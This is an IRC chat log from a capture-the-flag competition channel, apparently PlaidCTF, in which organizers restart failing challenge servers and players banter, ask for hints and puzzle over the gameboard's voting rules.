(10:04:29) (_ML) web300 down now
(10:04:40) (_ML) tylerni7: web300 down now :(
(10:04:42) (quangntenemy) :(
(10:05:07) (stypr) quangntenemy: it's ok
(10:05:11) (stypr) let's do kpop
(10:05:14) (stypr) or something else
(10:05:18) (quangntenemy) i need to rest my eyes lol
(10:05:28) (stypr) it's night here too
(10:05:28) (f0rki) disabling javascript helps a lot ^^
(10:05:32) (+mserrano) bubble bubble pop pop
(10:05:55) (+tylerni7) try reekee again
(10:06:01) (+tylerni7) added a timeout to kill gunicorn things
(10:06:07) (+tylerni7) something is making it sad, not quite sure what
(10:06:08) (admiral0) ty
(10:06:17) (+tylerni7) ugh
(10:06:19) (+tylerni7) still seems slow/hanging
(10:06:27) (criple_ripper) perhaps because it's still dead :P
(10:06:29) (f0rki) yeah
(10:06:37) (ByteMyEth0) hey tyler could I steal you for a sec?
(10:06:43) (stypr) nope
(10:06:43) (+tylerni7) h/o lemme fix reekee
(10:06:48) (_ML) tylerni7:
(10:06:53) (_ML) seems mysql of web300 was down
(10:07:29) (ryan-c) tylerni7: can you please take a look at my pm?
(10:07:53) jOin: (irctc366) (62a90e81@gateway/web/freenode/ip.98.169.14.129)
(10:09:02) qUit: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250) Quit: Page closed
(10:09:57) (+mserrano) whatscat hopefully back to reasonable
(10:10:03) +mserrano restarted/reset mysql
(10:10:35) (+tylerni7) can people look at reekee, just restarted, this time I'm logging to see..
(10:10:49) qUit: (rvpersie) (
[email protected]) Remote host closed the connection
(10:10:50) (+tylerni7) seems to be working though
(10:11:24) (quangntenemy) tylerni7: i'm still getting blank pages
(10:11:28) (+tylerni7) .aaand not it seems dead ok
(10:11:29) (+tylerni7) imma reboot
(10:11:31) +tylerni7 shrugs
(10:11:53) (bobsteam) itwasntme
(10:12:02) (admiral0) me neither *shrug*
(10:12:05) qUit: (irctc366) (62a90e81@gateway/web/freenode/ip.98.169.14.129) Ping timeout: 240 seconds
(10:12:46) (j0f) you had to make it that hard? xD
(10:12:46) (criple_ripper) tylerni7 take the server out of the room and bring it back in..
(10:12:50) (criple_ripper) that should do it
(10:13:18) (+mserrano) j0f: ?
(10:13:29) (+mserrano) j0f: make what that hard?
(10:13:47) (+frozencemetery) http://xkcd.com/908/
(10:13:47) (j0f) mserrano, the whole ctf is tough & hard
(10:14:21) (bobsteam) tough and hard is good :D
(10:14:23) jOin: (albntomat0) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
(10:14:25) (Zoro) gay
(10:14:26) (bobsteam) twss
(10:14:34) (j0f) lol
(10:14:43) (kanghee) hmm, is reekee server still rebooting?
(10:15:07) (bobsteam) kanghee: doesn't seem up be up, so... hopefully?
(10:15:15) (+frozencemetery) kanghee: probably, aws is really slow at reboots. Give it a couple more minutes.
(10:15:26) (kanghee) k np
(10:17:02) qUit: (nullProtectorate) (
[email protected]) Remote host closed the connection
(10:17:22) (bobsteam) reekee up
(10:17:28) (admiral0) yeeee
(10:18:18) (mongo12) but sooo slow :/ or is it just me?
(10:18:31) qUit: (nvmr) (5164f498@gateway/web/freenode/ip.81.100.244.152) Quit: Page closed
(10:18:34) (bobsteam) isslow =)
(10:18:36) (player10) not just you
(10:18:45) (+tylerni7) hmmm
(10:19:36) qUit: (thx1143) (
[email protected]) Quit: This computer has gone to sleep
(10:19:59) (player10) Failed to connect to 54.82.251.203:8000
(10:20:01) (player10) :(
(10:20:12) (mongo12) yeah its dead now :/
(10:20:15) (javex) sorry
(10:20:35) qUit: (thisnicknameisav) (7b748d38@gateway/web/freenode/ip.123.116.141.56) Ping timeout: 240 seconds
(10:20:43) (+tylerni7) more workers now, let's see what happens
(10:20:47) (+tylerni7) probably will just die faster
(10:20:48) (+tylerni7) :P
(10:20:50) (jarCrack) hi can i join an existing team?
(10:20:56) (jarCrack) hi=how
(10:21:08) (ShortKidd) yeah
(10:21:26) (ShortKidd) If you find someone who will let you join their team
(10:21:38) (kanghee) reekee is way faster :)
(10:21:45) (ejo) damn kukuna sucks!
(10:21:55) (ejo) his health is so weak, and his attacks omg
(10:22:01) (jarCrack) lol i got one
(10:22:19) (jarCrack) but dont knoow how create an account without creating a new team
(10:22:38) (+tylerni7) reekee seems happier for now with more workers....
(10:22:48) (mongo12) much better now tylerni7
(10:22:49) (mongo12) thanks
(10:22:59) qUit: (bool101) (~bool@unaffiliated/bool101) Ping timeout: 240 seconds
(10:23:01) nIck: (toto) is now known as (Guest89597)
(10:27:34) jOin: (Bijan-E) (~bijan-e@unaffiliated/bijan-e)
(10:27:59) qUit: (poppopret) (
[email protected]) Remote host closed the connection
(10:28:38) qUit: (def) (2a709cb3@gateway/web/freenode/ip.42.112.156.179) Quit: Page closed
(10:29:26) jOin: (approximatehack) (7ab33139@gateway/web/freenode/ip.122.179.49.57)
(10:29:36) (sdfsfdsfd) hello world
(10:30:19) (+dickoff) if anyone's working on kappa I'd like to hear your current status
(10:30:24) (Zoro) 0_0
(10:30:40) (ShortKidd) I got to the "Darude - Sandstorm" part
(10:32:49) (pcc7) anyone working on PyJail?
(10:32:52) (Zoro) *** HEAP FUCKERY DETECTED ***
(10:33:48) (Barbara_Tracy) I have a question on web300?
(10:33:54) (Barbara_Tracy) crew, pls pm me
(10:34:10) (iZsh) dickoff: i think we're almost done we it
(10:34:13) (iZsh) with
(10:35:08) (Zoro) Which one is Kappa?
(10:35:25) (sven) pokemon
(10:38:08) ([SF]testdata) @ mods : where is zfs hidden .. cant find it in game board
(10:38:23) (+frozencemetery) have you tried flipping it?
(10:38:38) (+frozencemetery) [SF]testdata: ^
(10:38:59) (zoff_ita) anybody for whatscat (web300)?
(10:40:00) ([SF]testdata) frozencemetery : nope , its not visible in the board.. any other identification or pointers pls ?
(10:40:12) (+tylerni7) zoff_ita: yeah wht's up
(10:40:13) (+tylerni7) pm me
(10:40:19) (+frozencemetery) [SF]testdata: this tells me you didn't read the rules, which you should do before playing any ctf.
(10:40:21) (+frozencemetery) so go do that
(10:40:27) (+tylerni7) frozencemetery: eh
(10:40:42) (+tylerni7) rules: hack shit, get points; don't be a dick
(10:40:53) (+frozencemetery) tylerni7: also instructions on how to use the gameboard.
(10:41:07) (+tylerni7) sure, sure
(10:43:58) qUit: (sqrts|stephan) (
[email protected]) Read error: Connection reset by peer
(10:45:52) (player10) finally reekee
(10:46:17) (stypr) reekee something is wrong
(10:46:28) (stypr) I am angry right now.. I want to just solve that out
(10:46:35) qUit: (admiral0) (83af1cc5@gateway/web/freenode/ip.131.175.28.197) Ping timeout: 240 seconds
(10:46:53) (stypr) it's like getting a cancer on your brain
(10:46:55) (depierre) anybody for web150?
(10:47:05) qUit: ([SF]testdata) (75c1ace7@gateway/web/freenode/ip.117.193.172.231) Ping timeout: 240 seconds
(10:47:29) (+tylerni7) depierre: you can pm me for questions
(10:48:14) (+mserrano) or me
(10:50:31) jOin: ([SF]testdata) (75c1ace7@gateway/web/freenode/ip.117.193.172.231)
(10:51:23) (evertokki) so, i just came back and i see there are no hints lol
(10:51:33) qUit: (Stean) (
[email protected]) Read error: Connection reset by peer
(10:51:50) qUit: (EdHunter) (
[email protected]) Remote host closed the connection
(10:52:16) (+tylerni7) evertokki: if you're stuck you can try pming me, but unless something is broken/misleading I probably can't say too much
(10:52:26) (c0ax) django fuuu
(10:52:28) (c0ax) -_-
(10:52:59) (+tylerni7) anyway, now that the site shits itself less frequently, I hope everyone is enjoying the game :)
(10:53:37) (evertokki) tylerni7: :D thanks and plus, our team is enjoying the ctf :p
(10:54:32) (+tylerni7) cool, glad to hear it
(10:54:53) (+tylerni7) but yeah, the website fuckups are bad.. we're really sorry about that...
(10:55:01) (+tylerni7) we're gonna make things dead simple next year :|
(10:55:29) (player10) eindbazen ctf was smooth, maybe ask some tips from them
(10:55:29) qUit: (nagi_) (72cd2aad@gateway/web/freenode/ip.114.205.42.173) Quit: Page closed
(10:55:30) (mak`) static pages with flags sendend via email? ;]
(10:56:00) (+mserrano) mak`: or ctfinafile
(10:56:34) (mak`) sound good to me ;]
(10:56:51) (+tylerni7) player10: we've run smooth ones before, we just try to do too much fancy things with ajax etc
(10:56:56) (+tylerni7) and it always ends up breaking things :|
(10:57:08) (ByteMyEth0) i think me and my team are out of our leagues here.
(10:57:15) (ByteMyEth0) being in highschool and what not
(10:57:22) (+tylerni7) ByteMyEth0: :( yeah, it's a tough CTF
(10:57:27) (+mserrano) ByteMyEth0: the ctf is a little tough for beginners, yeah
(10:57:30) (+tylerni7) you can always stop for now and read writeups next week
(10:57:37) (+tylerni7) CSAW and picoctf are great for beginners :)
(10:57:47) (+tylerni7) I think defcon quals this year will have a "beginner" category
(10:58:27) (ByteMyEth0) our school did pico. tied for 4th, 97, and then it was like 200
(10:58:40) (+tylerni7) cool
(10:58:41) (+tylerni7) :)
(10:58:52) (ByteMyEth0) hash slinging hackers
(10:59:50) (+tylerni7) ahhh nice
(11:00:05) (pcc7) any help on pyjail?
(11:01:30) (+mserrano) pcc7: you can pm me
(11:02:52) (pez) did u publish any hints on rendevouz yet?
(11:03:08) (pez) published*
(11:03:09) (sven) http://play.plaidctf.com/problems/hints
(11:03:11) (sven) nope.
(11:03:16) (pez) thanks
(11:03:27) (_ML) tylerni7: web300 down again
(11:03:33) (+tylerni7) _ML: ok looking at it
(11:03:35) qUit: (approximatehack) (7ab33139@gateway/web/freenode/ip.122.179.49.57) Ping timeout: 240 seconds
(11:03:45) (chuckleberry) must be a real pain to host a popular ctf
(11:04:15) (+tylerni7) chuckleberry: I mean.. we've had quite a share of fuckups
(11:04:22) (+tylerni7) _ML: try now?
(11:04:58) (+tylerni7) I think the issue is there are people running tools, so when my script goes to refresh the database every hour, there is a lock contention which blocks for a long time
(11:05:04) +tylerni7 should fix this
(11:05:12) (chuckleberry) tylerni7: i've never played in a ctf with some issues
(11:05:14) (chuckleberry) don't worry about it
(11:05:21) (chuckleberry) *without
(11:05:31) (+mserrano) yeah, but we'd still like to have fewer
(11:05:35) (chuckleberry) :)
(11:05:44) (_ML) tylerni7: ty, but maybe u should fork to another one
(11:05:45) (_ML) :D
(11:05:54) (chuckleberry) ah fork off
(11:05:55) (chuckleberry) hoooooooooooooo
(11:05:57) (chuckleberry) ok, i'll stop
(11:06:10) (Meos) any people?
(11:07:13) jOin: (nagi_) (72cd2aad@gateway/web/freenode/ip.114.205.42.173)
(11:07:18) (iZsh) almost there :)
(11:07:22) (iZsh) w8
(11:10:22) (mak`) iZsh: dont rush to anything, take your time;]
(11:10:41) (iZsh) i'm not the one solving it :-)
(11:11:43) (+dickoff) for anyone working on kappa make sure you have the correct binary, there was a wrong one available when it first came out: http://play.plaidctf.com/files/kappa-f2fdf7fcc074cb0c66c3d80a48286450.tar.bz2
(11:12:08) jOin: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109)
(11:12:21) (sven) yeah.. we learned that a little bit too late and wasted some time :D
(11:12:44) (+dickoff) yeah, sorry about that :(
(11:12:53) qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Quit: Page closed
(11:13:02) qUit: (Meos) (
[email protected]) Quit: ChatZilla 0.9.90.1 [Firefox 28.0/20140314220517]
(11:13:28) (ByteMyEth0) i can't open kpop
(11:13:36) (ByteMyEth0) it might be me or everyone
(11:13:42) (+mserrano) wheeee kappa solve
(11:13:43) jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
(11:13:45) (x_x) Ot
(11:13:46) (+ricky) Nice, eindbazen!
(11:13:55) (x_x) ByteMyEth0: It's you. I've got kpop open.
(11:13:59) (+ricky) Er, I mean 0xffa
(11:14:07) (sven) \o/
(11:14:30) (+tylerni7) -_-
(11:16:47) (iZsh) ricky: :)
(11:17:00) (iZsh) ricky: you wont work for the UN :)
(11:17:25) (+ricky) Hehe
(11:17:52) (iZsh) mmmm, maybe i should go to sleep someday
(11:17:54) (sven) pff.. the math doesn't even work out. 0xffa != eindbazen
(11:18:20) (phiber_) so in this board game, how do you know your position?
(11:18:32) (+ricky) It's the box with the lines I think
(11:18:34) (+tylerni7) sven: :P
(11:18:40) (+tylerni7) maybe if we add someone else
(11:18:44) (phiber_) this shit is confusing
(11:18:52) (+tylerni7) phiber_: dude, I don't know
(11:18:54) (+ricky) It's just problem opening stuff, I treat it as a crapshoot
(11:19:10) (ramsexy) phiber_: read the ruleZzZzZZz
(11:19:27) (phiber_) how do I vote
(11:19:33) (phiber_) just leave the number marked?
(11:19:43) (phiber_) or do I have to press some "invisible" button
(11:19:51) (+tylerni7) I think you press on the circly thing
(11:19:51) (ramsexy) phiber_: dude, you should seriously read the rules lol
(11:20:06) (+tylerni7) like I think you click a segment
(11:20:09) (iZsh) rtfm
(11:20:10) (+tylerni7) and that is your vote
(11:20:11) (phiber_) rules says "vote on how many blahblah"
(11:20:15) (phiber_) but now how do I vote
(11:20:18) (phiber_) not how*
(11:20:40) (ramsexy) click on the number
(11:20:52) (ramsexy) it's a global vote
(11:21:06) (phiber_) and then wait till the voting period ends?
(11:21:12) (ramsexy) yaaa man
(11:21:20) (phiber_) oook
(11:21:20) jOin: (almac) (458cf96e@gateway/web/freenode/ip.69.140.249.110)
(11:21:29) (phiber_) has there been any thing released?
(11:21:32) (ghostpixel) I'm so close to solving the heartbleed one, i have the key output but i'm not sure what part is the key...
(11:21:41) (phiber_) any hint
(11:21:42) (+tylerni7) ghostpixel: the whole string
(11:21:43) (phiber_) god
(11:21:47) (ramsexy) we should get a flag when we get how the ctf work
(11:21:48) (+tylerni7) including flag{}
(11:21:52) (iZsh) omg, phiber_ is trying to kill us
(11:21:52) (phiber_) has there been any hint released?
(11:22:01) (sven) pfrt, why do you always want hints?
(11:22:02) (+tylerni7) phiber_: wut
(11:22:02) (phiber_) I didn't sleep enough
(11:22:03) (sven) hints are boring!
(11:22:05) (ghostpixel) tylerni7: thanks
(11:22:10) (iZsh) phiber_: i didnt sleep at all
(11:22:21) (pcc7) any one working on pyjail?
(11:22:25) (iZsh) sven: and they fuck up strategies :)
(11:22:40) (phiber_) tylerni7, the rules says there's a 5% chance of hint
(11:22:41) (iZsh) same thing for not releasing challs beforehand :)
(11:22:49) (+tylerni7) phiber_: oh yeah dude I dunno how that works
(11:22:59) (+tylerni7) I haven't had a chance to read the rules
(11:23:03) (phiber_) I'm asking if there has been any hints released in previous voting periods
(11:23:32) (ramsexy) i think the hints are global too? am i right?
(11:23:37) qUit: (Neuroticar) (~neurotica@unaffiliated/neuroticar) Quit: Leaving
(11:23:43) (mischa__) where is this reekee key, am i blind?
(11:24:11) (+tylerni7) mischa__: you need code exec
(11:24:36) (iZsh) onoes hint :)
(11:26:25) (KT) do we know the libc version used for the challs (ezhp for example)?
(11:26:50) (pcc7) is pyjail smth about thread?.
(11:26:51) (+mserrano) you shouldn't need it
(11:27:27) (dracu) how much time between chronosphere discharges ? (in general, or is it random ?)
(11:27:43) (+tylerni7) dracu: it "recharges" when a new problem is solved
(11:27:45) (sven) i think it's related to the number of unsolved challenges
(11:28:36) (+tylerni7) no
(11:28:41) (dracu) ok, nice
(11:28:42) (+tylerni7) there are a few challenges no one has solved
(11:29:07) (pcc7) well..
(11:30:05) (ramsexy) why you voted chance :(
(11:30:23) (+tylerni7) I think a new problem will open too
(11:31:24) (iZsh) are you sure you're chance's seed is not bugged?
(11:31:37) (iZsh) i dont recall anything but "unlucky" on "chance"
(11:31:46) (iZsh) s/you're/your
(11:32:07) (+tylerni7) I think the chance of it hitting is like 10%
(11:32:12) (+tylerni7) which is pretty low...
(11:32:23) (Anyny0) 70% chance of having nothing
(11:32:27) (Anyny0) It's in the rules
(11:32:31) (ramsexy) does the empty tiles count?
(11:32:43) (+tylerni7) I think empty tiles are skipped over
(11:32:54) (iZsh) well, chance is for the weak they say
(11:33:07) (+tylerni7) who says that :P
(11:33:23) qUit: (tedmeyer) (
[email protected]) Remote host closed the connection
(11:33:36) (Zoro) What's chance?
(11:33:59) (ShortKidd) It's not quite guarenteed
(11:34:14) (Reinhart) you have no chance to survive
(11:34:17) (Reinhart) make your time
(11:34:24) (+mserrano) ._.
(11:34:38) (bobsteam) take off every zig
(11:36:20) jOin: (approximatehack) (7ab354c7@gateway/web/freenode/ip.122.179.84.199)
(11:36:23) (+tylerni7) whee... this will be fun
(11:36:38) (sven) yay, crypto :D
(11:36:56) (+tylerni7) yeah, about as hard as rsa by our estimates
(11:37:05) (+tylerni7) though of course, rsa is forensics, not crypto ;)
(11:37:10) +tylerni7 coughs
(11:37:48) (NK_) :D
(11:38:00) qUit: (asdfafs) (afc14aa8@gateway/web/freenode/ip.175.193.74.168) Quit: Page closed
(11:38:29) (hellman) cool, crypto
(11:38:53) jOin: (Amnesia) (~Amnesia@unaffiliated/amnesia)
(11:39:00) (+tylerni7) hellman: maan solve rsa first
(11:39:10) (+tylerni7) :)
(11:39:27) (hellman) no no, i hate rsa now
(11:39:34) (+mserrano) :(
(11:39:35) (+tylerni7) D:
(11:39:36) (+tylerni7) aww
(11:39:40) (sven) <3 rsa
(11:39:46) (player10) is brute forcing of any kind expected for challenges?
(11:39:49) (+tylerni7) sven: were you the one to get it
(11:39:55) (sven) nope
(11:39:58) (sven) i'm just idling
(11:40:05) qUit: (ByteMyEth0) (18fe8dec@gateway/web/freenode/ip.24.254.141.236) Ping timeout: 240 seconds
(11:40:09) nIck: (mang) is now known as (pending)
(11:40:21) nIck: (pending) is now known as (amayzing)
(11:40:54) nIck: (amayzing) is now known as (checkmayte)
(11:41:06) jOin: (alamar) (alamar@2a02:180:a:1:1::110)
(11:41:18) jOin: (filky) (4e81ae54@gateway/web/freenode/ip.78.129.174.84)
(11:41:38) (filky) hey, who solved web200 (songs), this chall makes me crazy
(11:42:49) (+mserrano) player10: only for a very small number
(11:42:57) (+mserrano) whee for example requires bruteforcing some sha proof of work
(11:43:11) (+mserrano) (because otherwise dos'ing it would be too easy)
(11:43:19) (psifertex) is someone breaking reeekeeeeee?
(11:43:19) (player10) ok
(11:43:57) (psifertex) db keeps getting nuked pretty quickly and just now it appears in an odd state where /make/ returns nothing, though main shows I'm still logged in.
(11:44:09) (psifertex) (for multiple users too, so it's not just one messed up user)
(11:44:39) (+tylerni7) should only get nuked every 20 minutes
(11:44:41) (psifertex) yeah. failed to create user. someone screwed with the sqlite, maybe?
(11:44:48) (+tylerni7) yeah sometimes sqlite gets messed up
(11:44:50) (+tylerni7) I'll take a look
(11:44:51) (+tylerni7) h/o
(11:44:55) (psifertex) thx.
(11:45:51) (pcc7) anyone working on pyjail?
(11:46:07) (+tylerni7) can psifertex seems to be working now, at least for me
(11:46:25) (+tylerni7) pm me to describe the issues more if it's still sad
(11:46:28) (tarkiz) lol I keep just trying to solve twenty :\
(11:47:42) +tylerni7 assumes the silence means things are working
(11:48:11) ([pwn]TM) tylerni7: we can make some noise if you want it!
(11:48:24) (+tylerni7) heh
(11:48:28) (+tylerni7) it's okay :P
(11:48:38) (bobsteam) http://www.youtube.com/watch?v=_6-KspZegsE NOISE!
(11:49:40) qUit: (j0f) (~j0f@unaffiliated/j0f) Read error: Connection reset by peer
(11:50:05) jOin: (j0f) (~j0f@unaffiliated/j0f)
(11:50:23) qUit: (shabgard) (~mostafa@unaffiliated/shabgard) Read error: Connection reset by peer
(11:52:05) qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
(11:55:00) jOin: (nope_) (a2f31ed0@gateway/web/freenode/ip.162.243.30.208)
(11:55:11) qUit: (j0f) (~j0f@unaffiliated/j0f) Read error: Connection reset by peer
(11:55:28) jOin: (j0f) (~j0f@unaffiliated/j0f)
(11:56:29) qUit: (filky) (4e81ae54@gateway/web/freenode/ip.78.129.174.84) Quit: Page closed
(11:57:25) (n00bz) who is doing reekee?
(12:01:29) mOde: (ChanServ) sets (+o mserrano)
(12:01:34) tOpic: (mserrano) changes topic to (CTF has started but server is having issues | play.plaidctf.com)
(12:01:51) mOde: (mserrano) sets (-o mserrano)
(12:02:03) (evertokki) is hudak like, the korean word i think it is?
(12:02:07) qUit: (j0f) (~j0f@unaffiliated/j0f) Read error: Connection reset by peer
(12:02:56) jOin: (j0f) (~j0f@unaffiliated/j0f)
(12:03:11) (plo) g++ doesn't compile?
(12:03:20) (+tylerni7) plo: it should?
(12:03:59) (humper) it should compile with default key
(12:04:05) qUit: (j0f) (~j0f@unaffiliated/j0f) Read error: Connection reset by peer
(12:04:05) (plo) I don't think so :p
(12:04:40) (plo) just to be sure, because (I hope) I think I'm close
(12:05:56) (humper) i solved it and it compiled with default key
(12:05:56) (+tylerni7) it really should compile
(12:06:05) jOin: (HotShot) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88)
(12:06:22) jOin: (j0f) (~j0f@unaffiliated/j0f)
(12:08:16) (iago-x86) tenement is timing out
(12:08:35) qUit: (j0f) (~j0f@unaffiliated/j0f) Read error: Connection reset by peer
(12:08:38) (iago-x86) ah, there it goes
(12:08:41) iago-x86 carries on
(12:08:51) (+tylerni7) iago-x86: hm ok
(12:09:12) jOin: (j0f) (~j0f@unaffiliated/j0f)
(12:09:32) (Hertz_) anyone doing Paris ?
(12:10:00) (criple_ripper) hi any admin i can ask smt about whatscat?
(12:10:01) (robbje) Hertz_: ew.
(12:10:06) (+tylerni7) criple_ripper: sure
(12:10:10) (robbje) Paris Hilton?
(12:10:16) (hellman) who can i ask on wheeeeeee (crypto) ?
(12:10:23) (+tylerni7) hellman: me or mserrano
(12:10:45) jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
(12:10:56) (Hertz_) yes robbje
(12:10:57) (Hertz_) :))
(12:12:40) (+gbarboza) iago-x86: I rebooted the old box, there's a new IP in the problem desc that you should use.
(12:13:47) (iago-x86) gbarboza: cool, thanks!
(12:14:40) (tarkiz) so is there a way to tell which number on the wheel corresponds with which category?
(12:14:50) qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Quit: Page closed
(12:15:15) (+tylerni7) tarkiz: I think when you hover or click during a voting period, it will tell you
(12:15:25) jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
(12:15:29) (tarkiz) okay I'll check that out next time...ty
(12:15:52) evertokki needs hint, vote 2 next timez
(12:16:15) (sven) new challenges >>> hints :P
(12:16:29) (bobsteam) anyone up for a question on reekee
(12:16:31) (evertokki) :P
(12:16:45) (+tylerni7) bobsteam: you can pm me
(12:17:03) (+tylerni7) might not tell you the answer though, depending on the question :)
(12:17:12) (inter) tylerni7: what happened to TheRealTyler
(12:17:21) (inter) and tylerma7
(12:17:27) +tylerni7 shrugs
(12:17:34) (+mserrano) we launched nuclear weapons at them
(12:17:40) (+tylerni7) aren't we all TheRealTyler, in our hearts?
(12:17:53) (inter) what if i am christ
(12:18:00) (inter) hesus mehico christ
(12:18:15) (+frozencemetery) "mehico"?
(12:19:58) (evertokki) lol
(12:20:35) (funtimes) is g++ supposed to have keys that will not compile?
(12:20:38) (+dickoff) will the real tylerni7 please stand up
(12:20:43) +tylerni7 stands up
(12:20:53) (inter) Automatic stabilizers are changes in ?scal policy that stimulate aggregate demand when the
(12:20:53) (inter) economy goes into a recession without policymakers having to take any deliberate action; eg,
(12:21:00) (+tylerni7) funtimes: it should compile..
(12:21:01) (inter) #econ
(12:21:15) (funtimes) tyler i've got 2 keys that will not so far
(12:21:18) (evertokki) anyone to pm for hudak?
(12:21:42) (funtimes) compiler just keeps going
(12:21:52) (+tylerni7) funtimes: some keys probably make it very sad
(12:21:53) (funtimes) just about crashed comp actually
(12:22:04) (+mserrano) evertokki: me
(12:22:04) (+tylerni7) yeah, I segfaulted g++ and clang many times
(12:22:11) qUit: (nullProtectorate) (
[email protected]) Ping timeout: 240 seconds
(12:22:12) (inter) g++
(12:22:17) (inter) was rather easier cypher
(12:22:21) (inter) than rsa
(12:22:31) (inter) thanks to tylerni7, wut a dickoff
(12:22:45) (+tylerni7) inter: did you solve rsa? :)
(12:22:56) (inter) what if i told you no
(12:23:02) (inter) but i got tiffany
(12:23:29) (+mserrano) :)
(12:23:32) (+mserrano) did you like it?
(12:23:34) (+tylerni7) I mean, that's fine, I was just curious
(12:23:46) (inter) tiffany was interesting
(12:24:04) (inter) i would give it 10/10 technicality
(12:24:19) (inter) i would give it 2.5/10 for how nice the problem was
(12:24:25) (+tylerni7) hahahaha
(12:24:27) (+mserrano) lol
(12:24:42) sven wants some reversing problems that aren't x86/x86_64 :<
(12:24:54) (inter) sven: 16bit vm
(12:24:57) (inter) back in gits
(12:25:02) (inter) or ndh?
(12:25:05) (inter) that was real
(12:25:13) (sven) gits? ndh?
(12:25:21) (inter) calculating payload was ridiculous
(12:25:21) (sven) i don't play a lot of ctf
(12:25:24) (inter) ghost in the shellcode
(12:25:41) (sven) arm, mips, powerpc... anything but plz not x86
(12:25:51) (sven) x86 makes me really angry
(12:25:57) (+mserrano) :(
(12:25:58) (+mserrano) why
(12:26:00) (+tylerni7) heh
(12:26:13) (sven) 'cause it needs to die in a huge and horrible fire
(12:26:20) (inter) tylerni7 was too lazy
(12:26:20) (chuckleberry) don't listen to him, more x86
(12:26:27) (sven) the only way i look at x86 stuff is with hex-rays :)
(12:26:35) (+mserrano) I think we have a good amount of x86 problems
(12:26:35) qUit: (l0l0l) (932e7f69@gateway/web/freenode/ip.147.46.127.105) Ping timeout: 240 seconds
(12:26:39) (chuckleberry) ugh
(12:26:43) (chuckleberry) hexrays sucks
(12:26:43) (inter) because the name was "reversing"
(12:26:46) (inter) i was actually expecting
(12:26:49) (inter) windows exes
(12:26:49) (chuckleberry) so many casts
(12:26:50) (sven) and more architectures would make it a lot more interesting - you need different tricks/approches for each of them
(12:26:55) (inter) but then i get elfs
(12:26:59) (inter) real whores
(12:27:00) (+mserrano) inter: we have a windows exe
(12:27:07) (inter) like one
(12:27:07) (+mserrano) no one has solved it!
(12:27:27) (sven) yeah, well. it's windows and x86. can't get much worse ;)
(12:27:34) (+mserrano) lol
(12:27:37) (inter) i uses cracked ida >:)
(12:29:54) (pcc7) eh anyone working on pyjail......
(12:30:13) (sven) nah, we're all long done with that one
(12:30:24) (+mserrano) bamboooooooooooooooooooooooooooooooo
(12:30:28) (+mserrano) plssssssssssssssssssssssssssss
(12:30:30) (mouth`) can we pm a mod about whatscat?
(12:30:35) (+tylerni7) mouth`: sure
(12:30:43) (inter) pyjail?
(12:30:46) (inter) fuck that
(12:31:03) (inter) every method i could think of is wrong
(12:37:20) nIck: (mah_one_) is now known as (mah_one)
(12:38:35) (+tylerni7) pctf_scoreboard: poop
(12:38:55) (+mserrano) tylerni7: no u
(12:40:36) qUit: (approximatehack) (7ab354c7@gateway/web/freenode/ip.122.179.84.199) Ping timeout: 240 seconds
(12:41:10) (+mserrano) whee DS
(12:41:18) (+mserrano) Gynvael: j00ru: :)
(12:41:31) (mak`) actualy Redford ;]
(12:41:43) (+tylerni7) nice :)
(12:41:48) (Redford) hard task :)
(12:41:58) (supersat) which one is the windows exe?
(12:42:04) (+mserrano) supersat: paris
(12:43:26) (evertokki) the eiffel tower!
(12:43:32) evertokki throws a random trout
(12:43:52) (+dickoff) tylerni7: don't leak keys!
(12:44:01) (+tylerni7) oh shoot
(12:44:07) (+tylerni7) now everyone knows poop is a key :(
(12:45:32) mOde: (ChanServ) sets (+o mserrano)
(12:45:51) tOpic: (mserrano) changes topic to (CTF has started but server is having issues | play.plaidctf.com | since tylerni7 leaked it, poop is a flag)
(12:45:57) mOde: (mserrano) sets (-o mserrano)
(12:46:02) (evertokki) lol
(12:46:10) (+tylerni7) D:
(12:46:12) (+tylerni7) I'm sorry guys
(12:46:17) (evertokki) lool
(12:47:25) qUit: (Frisk0) (~Frisk0@2601:7:9e00:8f:7113:3ac:9f72:3881) Quit: Quitte
(12:49:42) (inter) brb exam
(12:49:44) (inter) huehue
(12:49:54) (bobsteam) gl!
(12:49:59) (sewilton) Is wheeeee down? 54.82.75.29:8193
(12:50:58) (mrsmith67) anyone i can ask about misc250?
(12:51:17) (+mserrano) sewilton: responds to me
(12:51:23) (+mserrano) sewilton: it's not a web page, you need to nc to it
(12:52:03) (zzoru) vote time :)
(12:52:54) (mouth`)
(12:52:54) (sewilton) mserrano: Whoops, thanks
(12:54:47) qUit: (gameredan) (~gameredan@unaffiliated/gameredan) Ping timeout: 240 seconds
(12:55:05) qUit: ([SF]testdata) (75c1ace7@gateway/web/freenode/ip.117.193.172.231) Ping timeout: 240 seconds
(12:56:15) (evertokki) VOTE FOR 2
(12:56:18) (evertokki) HINTS
(12:56:19) (evertokki) HINTS
(12:56:41) (evertokki) OR 5 IDONT CARE
(12:59:21) mOde: (ChanServ) sets (+v frozencemetery)
(13:01:10) (player10) is rendezvous (misc250) down?
(13:01:22) (+tylerni7) player10: no
(13:01:26) (player10) okay tnx
(13:02:28) (supersat) yeah the windows one is evil :P
(13:06:09) qUit: (JustMeAsd) (
[email protected]) Remote host closed the connection
(13:06:18) qUit: (humper) (~r@unaffiliated/humber) Quit: Leaving
(13:06:26) jOin: (sorin) (5e34c7a9@gateway/web/freenode/ip.94.52.199.169)
(13:08:07) (evertokki) wait is the vote over
(13:08:27) (evertokki) wats happening to the chronosphere
(13:10:07) (evertokki) is 'chronosphere discharge 2 minutes ago' supposed to be normal..?
(13:10:22) (+mserrano) evertokki: says in a minute for me
(13:10:24) (shadghost) Hi, is the tor one down atm?
(13:10:39) (Zoro) it's not down. You just have to rendezvous.
(13:10:57) (evertokki) mserrano: hmm, I guess its my computer's problem then.
(13:11:36) (evertokki) THE CHANCE
(13:11:41) (evertokki) THE HOLY F
(13:11:53) (+mserrano) lol have you guys ever gotten chance to do anything
